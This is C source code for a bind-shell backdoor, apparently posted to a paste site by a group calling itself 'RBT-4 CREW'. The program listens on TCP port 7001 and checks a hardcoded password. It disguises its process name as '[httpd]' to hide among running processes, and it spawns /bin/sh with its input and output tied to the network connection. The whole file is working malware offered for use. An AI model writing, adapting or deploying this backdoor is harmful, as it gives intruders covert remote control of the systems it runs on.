/**************************************************************************
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Coded By Matrix86 ----> matrix86 {AT} tuxmealux {DOT} net
****************************************************************************/
#include <sys/types.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdio.h>
#include <time.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#define PORT 7001
#define N_BUF 2048
#define BACKLOG 10
#define PASS "matrix86"
void mypipe(int con);
//Funzione per dare il colpo finale ai processi figli...in modo da non creare processi zombie!
void HandSigCHLD(int sig)
{
int status;
pid_t wpid;
wpid = waitpid(WAIT_ANY, &status, WNOHANG);
//if (wpid > 0) printf("BG child %d terminated with status %x\n", wpid, status);
return;
}
int main(int argc,char *argv[]){
struct sockaddr_in server;
int sock,conn,nw;
pid_t pid;
char init[] = "**********************************************\n* RBT-4 CREW *\n**********************************************\n* BindShell coded by Matrix86 for Rbt-4 Crew *\n* Thx to Black_Student,r080cy90r and *\n* all my friends. *\n* Special Thx to my girlfriend ;) *\n* *\n**********************************************\n\nDigit \"exit\" to close connection. Good fun ;)\n\n";
// Per nascondere il programma tra i processi...
strcpy(argv[0],"[httpd]");
signal(SIGCHLD, HandSigCHLD);
signal(SIGHUP, SIG_IGN);
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0){
// perror("Errore durante la creazione del socket: ");
_exit(1);
}
memset((void *)&server,0,sizeof(server));
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sock, (struct sockaddr *)&server, sizeof(server)) < 0){
// perror("Errore Bind: ");
_exit(1);
}
if (listen(sock, BACKLOG) < 0 ) {
// perror("Errore Listen: ");
_exit(1);
}
while(1){
while(((conn = accept(sock, (struct sockaddr *) NULL, NULL)) < 0) && (errno == EINTR));
if (conn < 0) {
// perror("Errore accept: ");
_exit(1);
}
// Creo un processo figlio...in modo da gestire piĆ¹ connessioni contemporaneamente.
if ((pid=fork()) < 0){
// perror("Errore fork() :");
_exit(1);
}
if(pid == 0){
// Siamo nel processo figlio.
close(sock);
if((nw = write(conn,init,strlen(init))) == 0) _exit(1);
mypipe(conn);
close(conn);
_exit(0);
}
else {
close(conn);
}
}
fprintf(stdout,"Uscita");
return 0;
}
void mypipe(int con){
char buffer[N_BUF+1];
int nw,nr;
if((nw = write(con,"Password: ",10)) == 0) _exit(1);
nr = read(con,buffer,N_BUF);
buffer[nr-2] = 0;
// Controlla la password...
if(strcmp(buffer, PASS) != 0) return;
if((nw = write(con,"\n\nsh> ",6)) == 0) _exit(1);
dup2(con,0);
dup2(con,1);
dup2(con,2);
execl("/bin/sh","sh",(char *)0);
return;
}
NoPaste Service
DOWNLOAD